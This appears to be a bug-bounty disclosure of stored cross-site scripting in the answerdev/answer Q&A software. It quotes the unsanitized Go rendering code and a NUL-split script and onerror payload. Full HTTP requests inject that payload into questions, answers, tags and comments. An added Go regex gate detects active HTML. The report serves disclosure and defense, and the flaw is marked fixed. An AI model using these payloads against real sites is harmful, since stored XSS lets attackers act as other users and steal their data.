Multiple XSS @ answer/question/tag in answerdev/answer

Valid

Reported on

Mar 8th 2023


Description

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Proof of Concept

Posting the Question:

func (req *QuestionAdd) Check() (errFields []*validator.FormErrorField, err error) {
    req.HTML = converter.Markdown2HTML(req.Content)
    for _, tag := range req.Tags {
        if len(tag.OriginalText) > 0 {
            tag.ParsedText = converter.Markdown2HTML(tag.OriginalText)
        }
    }
    return nil, nil
}

Updating the Question:

func (req *QuestionUpdate) Check() (errFields []*validator.FormErrorField, err error) {
    req.HTML = converter.Markdown2HTML(req.Content)
    return nil, nil
}

Posting the Answer:

func (req *AnswerAddReq) Check() (errFields []*validator.FormErrorField, err error) {
    req.HTML = converter.Markdown2HTML(req.Content)
    return nil, nil
}

Updating the Answer:

func (req *AnswerUpdateReq) Check() (errFields []*validator.FormErrorField, err error) {
    req.HTML = converter.Markdown2HTML(req.Content)
    return nil, nil
}

Updating the Tag:

func (r *UpdateTagReq) Check() (errFields []*validator.FormErrorField, err error) {
    if len(r.EditSummary) == 0 {
        r.EditSummary = "tag.edit.summary"
    }
    r.ParsedText = converter.Markdown2HTML(r.OriginalText)
    return nil, nil
}

Adding a Comment:

func (req *AddCommentReq) Check() (errFields []*validator.FormErrorField, err error) {
    req.ParsedText = converter.Markdown2HTML(req.OriginalText)
    return nil, nil
}

Updating a Comment:

func (req *UpdateCommentReq) Check() (errFields []*validator.FormErrorField, err error) {
    req.ParsedText = converter.Markdown2HTML(req.OriginalText)
    return nil, nil
}

Payload:

<script>alert(1)<\\x00/script>
<style></style><img src=x onerror=alert(1)//>
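Added example (not code from answerdev/answer): a regression gate a maintainer could run over the rendered HTML that the Check() methods above assign to req.HTML and req.ParsedText. It strips the NUL byte the payload uses to split the closing script tag and then flags script/style tags, inline event handlers and javascript: URLs; the pattern names, the normalize helper and the handling of a literal "\x00" escape are assumptions of this example, and it is a test-time heuristic, not a replacement for an allowlist sanitizer.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// activePattern names a construct that must not survive Markdown2HTML
// when the input came from a user.
type activePattern struct {
	name string
	re   *regexp.Regexp
}

// Matched after normalization, so the "<\x00/script>" split in the
// report's payload does not hide the tag name from the regexps.
var activePatterns = []activePattern{
	{"script/style/iframe/object/embed tag", regexp.MustCompile(`(?i)<\s*/?\s*(script|style|iframe|object|embed)\b`)},
	{"inline event handler", regexp.MustCompile(`(?i)\son[a-z]+\s*=`)},
	{"javascript: URL", regexp.MustCompile(`(?i)(href|src)\s*=\s*["']?\s*javascript:`)},
}

// normalize drops a raw NUL byte and (an assumption of this example, since
// the report writes the byte as \x00) the literal escape sequence as well.
func normalize(rendered string) string {
	return strings.NewReplacer("\x00", "", `\x00`, "").Replace(rendered)
}

// ActiveContentFindings returns the name of every pattern present in the
// rendered HTML, in the order of activePatterns; empty means clean.
func ActiveContentFindings(rendered string) []string {
	n := normalize(rendered)
	var found []string
	for _, p := range activePatterns {
		if p.re.MatchString(n) {
			found = append(found, p.name)
		}
	}
	return found
}

// CheckRendered is the gate a Check() method could apply before the rendered
// value is stored: reject it instead of passing active content through.
func CheckRendered(rendered string) error {
	if f := ActiveContentFindings(rendered); len(f) > 0 {
		return fmt.Errorf("rendered HTML contains active content: %s", strings.Join(f, ", "))
	}
	return nil
}
```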

Request @ Question:

POST /answer/api/v1/question HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
Content-Type: application/json
Content-Length: 213
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/questions/ask
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"title":"question","content":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","tags":[{"original_text":"","parsed_text":"","slug_name":"nano","recommend":false,"reserved":false}]}

Request @ Answer:

POST /answer/api/v1/post/render HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
Content-Type: application/json
Content-Length: 95
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/questions/10010000000000007
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"content":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>\n"}

Request @ Tag:

PUT /answer/api/v1/tag HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
Content-Type: application/json
Content-Length: 272
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/tags/10030000000000002/edit
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"display_name":"a","slug_name":"a","original_text":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","parsed_text":"<style></style><img src=x onerror=alert(1)//><blockquote>\n</blockquote>\n","tag_id":"10030000000000002","edit_summary":""}

Request @ Comment:

POST /answer/api/v1/comment HTTP/1.1
Host: localhost:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 1d798f13-bda1-11ed-9586-0242ac110002
Content-Type: application/json
Content-Length: 158
Origin: http://localhost:9080
Connection: close
Referer: http://localhost:9080/questions/10010000000000012/nadahh
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"object_id":"10020000000000015","original_text":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","mention_username_list":[]}

Impact

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs.

joyqi validated this vulnerability 2 months ago
hatlesswizard has been awarded the disclosure bounty
joyqi marked this as fixed in 1.0.7 with commit c3743b 2 months ago
This vulnerability has been assigned a CVE
joyqi published this vulnerability 2 months ago